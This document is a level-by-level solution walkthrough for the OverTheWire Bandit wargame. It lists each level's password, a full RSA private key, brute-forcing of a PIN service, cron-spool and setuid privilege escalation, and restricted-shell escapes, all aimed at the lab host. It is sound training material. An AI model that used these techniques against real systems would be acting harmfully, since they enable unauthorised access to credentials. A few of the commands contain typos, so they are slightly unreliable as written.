Level 0
Password (given): bandit0
1
2
3
ssh bandit0@bandit.labs.overthewire.org -p 2220
ls -al
cat readme
Level 1
Password: boJ9jbbUNNfktd78OOpsqOltutMc3MY1
1
2
3
ssh bandit1@bandit.labs.overthewire.org -p 2220
ls -al
cat ./-
Level 2
Password: CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
1
2
3
ssh bandit2@bandit.labs.overthewire.org -p 2220
ls -al
cat "spaces in this filename"
Level 3
Password: UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK
1
2
3
4
5
ssh bandit3@bandit.labs.overthewire.org -p 2220
ls -al
cd inhere
ls -al
cat .hidden
Level 4
Password: pIwrPrtPN36QITSp3EQaw936yaFoFgAB
1
2
3
4
5
ssh bandit4@bandit.labs.overthewire.org -p 2220
ls -al
cd inhere
ls -al
for f in *; do cat ./$f; echo; done
Level 5
Password: koReBOKuIDDepwhWk7jZC0RTdopnAYKh
Instructions:
- human-readable
- 1033 bytes in size
- not executable
1
2
3
4
5
6
ssh bandit5@bandit.labs.overthewire.org -p 2220
ls -al
cd inhere
ls -al
find . -type f -size 1033c ! -executable
cat ./maybehere07/.file2
Level 6
Password: DXjZPULLxYr17uwoI01bNLQbtFemEgo7
Instructions:
- owned by user bandit7
- owned by group bandit6
- 33 bytes in size
1
2
3
ssh bandit6@bandit.labs.overthewire.org -p 2220
find / -type f -size 33c -group bandit6 -user bandit7
cat /var/lib/dpkg/info/bandit7.password
Level 7
Password: HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs
Instructions:
The password for the next level is stored in the file data.txt next to the word millionth
1
2
ssh bandi7@bandit.labs.overthewire.org -p 2220
grep millionth data.txt
Level 8
Password: cvX2JJa4CFALtqS87jk27qwqGhBM9plV
Instructions:
The password for the next level is stored in the file data.txt and is the only line of text that occurs only once
1
2
ssh bandi8@bandit.labs.overthewire.org -p 2220
cat data.txt | sort | uniq -c
Level 9
Password: UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR
Instructions:
The password for the next level is stored in the file data.txt in one of the few human-readable strings, beginning with several ‘=’ characters.
1
2
ssh bandi9@bandit.labs.overthewire.org -p 2220
strings data.txt | grep ====
Level 10
Password: truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk
Instructions:
The password for the next level is stored in the file data.txt, which contains base64 encoded data
1
2
ssh bandi10@bandit.labs.overthewire.org -p 2220
base64 -d data.txt
Level 11
Password: IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR
Instructions:
The password for the next level is stored in the file data.txt, where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions
1
2
ssh bandi11@bandit.labs.overthewire.org -p 2220
cat data.txt | tr '[A-Za-z]' '[N-ZA-Mn-za-m]'
Level 12
Password: 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu
Instructions:
The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work using mkdir. For example: mkdir /tmp/myname123. Then copy the datafile using cp, and rename it using mv (read the manpages!)
1
2
3
4
5
6
7
8
9
10
11
ssh bandit12@bandit.labs.overthewire.org -p 2220
xxd -r data.txt | file -
xxd -r data.txt | zcat | file -
xxd -r data.txt | zcat | bzcat | file -
xxd -r data.txt | zcat | bzcat | zcat | file -
xxd -r data.txt | zcat | bzcat | zcat | tar xO | file -
xxd -r data.txt | zcat | bzcat | zcat | tar xO | tar xO | file -
xxd -r data.txt | zcat | bzcat | zcat | tar xO | tar xO | bzcat | file -
xxd -r data.txt | zcat | bzcat | zcat | tar xO | tar xO | bzcat | tar xO | file -
xxd -r data.txt | zcat | bzcat | zcat | tar xO | tar xO | bzcat | tar xO | zcat | file -
xxd -r data.txt | zcat | bzcat | zcat | tar xO | tar xO | bzcat | tar xO | zcat
Level 13
Password: 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
Instructions:
The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. Note: localhost is a hostname that refers to the machine you are working on
1
2
3
4
5
ssh bandit13@bandit.labs.overthewire.org -p 2220
ls -a
cat sshkey.private
ssh bandit14@localhost -i sshkey.private
cat /etc/bandit_pass/bandit14
Level 14
Password: 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Instructions:
The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost.
1
2
ssh bandit14@bandit.labs.overthewire.org -p 2220
echo "4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e" | nc localhost 30000
Level 15
Password: BfMYroe26WYalil77FoDi9qh59eK5xNr
Instructions:
The password for the next level can be retrieved by submitting the password of the current level to port 30001 on localhost using SSL encryption.
Helpful note: Getting “HEARTBEATING” and “Read R BLOCK”? Use -ign_eof and read the “CONNECTED COMMANDS” section in the manpage. Next to ‘R’ and ‘Q’, the ‘B’ command also works in this version of that command…
1
2
ssh bandit15@bandit.labs.overthewire.org -p 2220
(echo "BfMYroe26WYalil77FoDi9qh59eK5xNr"; sleep 2;) | openssl s_client -connect localhost:30001
Level 16
Password: cluFn7wTiGryunymYOu4RcffSxQluehd
Instructions:
The credentials for the next level can be retrieved by submitting the password of the current level to a port on localhost in the range 31000 to 32000. First find out which of these ports have a server listening on them. Then find out which of those speak SSL and which don’t. There is only 1 server that will give the next credentials, the others will simply send back to you whatever you send to it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
ssh bandit16@bandit.labs.overthewire.org -p 2220
nmap -p 31000-32000 localhost
(echo "cluFn7wTiGryunymYOu4RcffSxQluehd"; sleep 2;) | openssl s_client -connect localhost:31790
mkdir /tmp/cudnohu1_1
echo "-----BEGIN RSA PRIVATE KEY-----
> MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
> imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
> Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
> DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
> JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
> x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
> KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
> J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
> d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
> YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
> vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
> +TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
> 8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
> SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
> HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
> SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
> R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
> Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
> R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
> L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
> blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
> YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
> 77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
> dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3
> vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=
> -----END RSA PRIVATE KEY-----" > /tmp/cudnohu1_1/bandit17.key
chmod 700 /tmp/cudnohu1_1/badit17.key
ssh -i /tmp/cudnohu1_1/bandit17.key bandit17@localhost
cat /etc/bandit_pass/bandit17
Level 17
Password: xLYVMN9WE5zQ5vHacb0sZEVqbrp7nBTn
Instructions:
There are 2 files in the homedirectory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new
1
2
ssh bandit17@bandit.labs.overthewire.org -p 2220
diff passwords.old passwords.new
Level 18
Password: kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
Instructions:
The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.
1
ssh bandit18@bandit.labs.overthewire.org -p 2220 cat readme
Level 19
Password: IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x
Instructions:
To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used the setuid binary.
1
2
ssh bandit19@bandit.labs.overthewire.org -p 2220
./bandit20-do cat /etc/bandit_pass/bandit20
Level 20
Password: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Instructions:
There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).
1
2
3
ssh bandit20@bandit.labs.overthewire.org -p 2220
echo "GbKksEFF4yrVs6il55v6gwY5aVje5f0j" | nc -l localhost -p 12345 &
./suconnect 12345
Level 21
Password: gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
Instructions:
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
1
2
3
4
5
6
ssh bandit21@bandit.labs.overthewire.org -p 2220
cd /etc/cron.d/
ls -al
cat cronjob_bandit22
cat /usr/bin/cronjob_bandit22.sh
/tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Level 22
Password: Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Instructions:
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
1
2
3
4
5
ssh bandit22@bandit.labs.overthewire.org -p 2220
cat /etc/cron.d/cronjob_bandit23
cat /usr/bin/cronjob_bandit23.sh
echo "I am user bandit23" | md5sum | cut -d ' ' -f 1
cat /tmp/8ca319486bfbbc3663ea0fbe81326349
Level 23
Password: jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
Instructions:
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
1
2
3
4
5
6
7
8
9
10
ssh bandit23@bandit.labs.overthewire.org -p 2220
cat /etc/cron.d/cronjob_bandit24
cat /usr/bin/cronjob_bandit24.sh
mkdir /tmp/cudnohu1_2
echo "#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/cudnohu1_2/bandit24" > /tmp/cudnohu1_2/grabthepass.sh
touch bandit24
chmod 777 /tmp/cudnohu1_2/*
cp /tmp/cudnohu1_2/grabthepass.sh /var/spool/bandit24/
sleep 60 && cat /tmp/cudnohu1_2/bandit24
Level 24
Password: UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
Instructions:
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
1
2
3
4
5
6
ssh bandit24@bandit.labs.overthewire.org -p 2220
mkdir /tmp/cudnohu1_3
cd /tmp/cudnohu1_3
vi grabthepass.sh
chmod +x grabthepass.sh
./grabthepass.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/bin/bash
for i in {0..9}
do
> /tmp/cudnohu1_3/passlist
for j in {000..999}
do
echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i$j" >> /tmp/cudnohu1_3/passlist
done
cat /tmp/cudnohu1_3/passlist | nc -w 5 localhost 30002 | grep -v "Wrong"
done
Note this required being broken apart into sections due to hitting the timeout on connections
Level 25
Password: uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Instructions:
Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.
1
2
3
4
5
6
7
8
ssh bandit25@bandit.labs.overthewire.org -p 2220
ls -al
cat bandit26.sshkey
grep bandit26 /etc/passwd
cat /usr/bin/showtext
ssh bandit26@localhost -o StrictHostKeyChecking=no -i ~/bandit26.sshkey
v
:e /etc/bandit_pass/bandit26
Note: The terminal window needs to be of minimal height for the more operation when sshing to user bandit26. If the terminal is too large, the file will just display on the screen and exit.
Level 26
Password: 5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z
Instructions:
Good job getting a shell! Now hurry and grab the password for bandit27!
1
2
3
4
5
6
ssh bandit26@bandit.labs.overthewire.org -p 2220
v
:set shell=/bin/bash
:shell
ls -al
./bandit27-do cat /etc/bandit_pass/bandit27
Note: You will need to use the window resizing trick from the previous level here as well.
Level 27
Password: 3ba3118a22e93127a4ed485be72ef5ea
Instructions:
There is a git repository at ssh://bandit27-git@localhost/home/bandit27-git/repo. The password for the user bandit27-git is the same as for the user bandit27.
Clone the repository and find the password for the next level.
1
2
3
4
5
6
7
ssh bandit27@bandit.labs.overthewire.org -p 2220
mkdir /tmp/cudnohu1_4
cd /tmp/cudnohu1_4
git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
cd repo
ls -al
cat README
Level 28
Password: 0ef186ac70e04ea33b4c1853d2526fa2
Instructions:
There is a git repository at ssh://bandit28-git@localhost/home/bandit28-git/repo. The password for the user bandit28-git is the same as for the user bandit28.
Clone the repository and find the password for the next level.
1
2
3
4
5
6
7
ssh bandit28@bandit.labs.overthewire.org -p 2220
mkdir /tmp/cudnohu1_5
cd /tmp/cudnohu1_5
git clone ssh://bandit28-git@localhost/home/bandit28-git/repo
cd repo
ls -al
git log -p README
Level 29
Password: bbc96594b4e001778eee9975372716b2
Instructions:
There is a git repository at ssh://bandit29-git@localhost/home/bandit29-git/repo. The password for the user bandit29-git is the same as for the user bandit29.
Clone the repository and find the password for the next level.
1
2
3
4
5
6
7
8
9
10
11
ssh bandit29@bandit.labs.overthewire.org -p 2220
mkdir /tmp/cudnohu1_6
cd /tmp/cudnohu1_6
git clone ssh://bandit29-git@localhost/home/bandit29-git/repo
cd repo
ls -al
git log -p README
git branch
git branch -r
git checkout dev
cat README
Level 30
Password: 5b90576bedb2cc04c86a9e924ce42faf
Instructions:
There is a git repository at ssh://bandit30-git@localhost/home/bandit30-git/repo. The password for the user bandit30-git is the same as for the user bandit30.
Clone the repository and find the password for the next level.
1
2
3
4
5
6
7
8
9
10
11
12
ssh bandit30@bandit.labs.overthewire.org -p 2220
mkdir /tmp/cudnohu1_7
cd /tmp/cudnohu1_7
git clone ssh://bandit30-git@localhost/home/bandit30-git/repo
cd repo
ls -al
cat README
git log -p README
git branch
git branch -r
git tag
git show secret
Level 31
Password: 47e603bb428404d265f59c42920d81e5
Instructions:
There is a git repository at ssh://bandit31-git@localhost/home/bandit31-git/repo. The password for the user bandit31-git is the same as for the user bandit31.
Clone the repository and find the password for the next level.
1
2
3
4
5
6
7
8
9
10
11
12
13
ssh bandit31@bandit.labs.overthewire.org -p 2220
mkdir /tmp/cudnohu1_8
cd /tmp/cudnohu1_8
git clone ssh://bandit31-git@localhost/home/bandit31-git/repo
cd repo
ls -al
cat README
cat .gitignore
rm .gitignore
echo 'May I come in?' > key.txt
git add key.txt
git commit -a
git push
Level 32
Password: 56a9bf19c63d650ce78e6ec0354ee45e
Instructions:
After all this git stuff its time for another escape. Good luck!
1
2
3
ssh bandit32@bandit.labs.overthewire.org -p 2220
$0
cat /etc/bandit_pass/bandit33
Level 33
Password: c9c3199ddf4121b10cf581a98d51caee
Instructions:
At this moment, level 34 does not exist yet.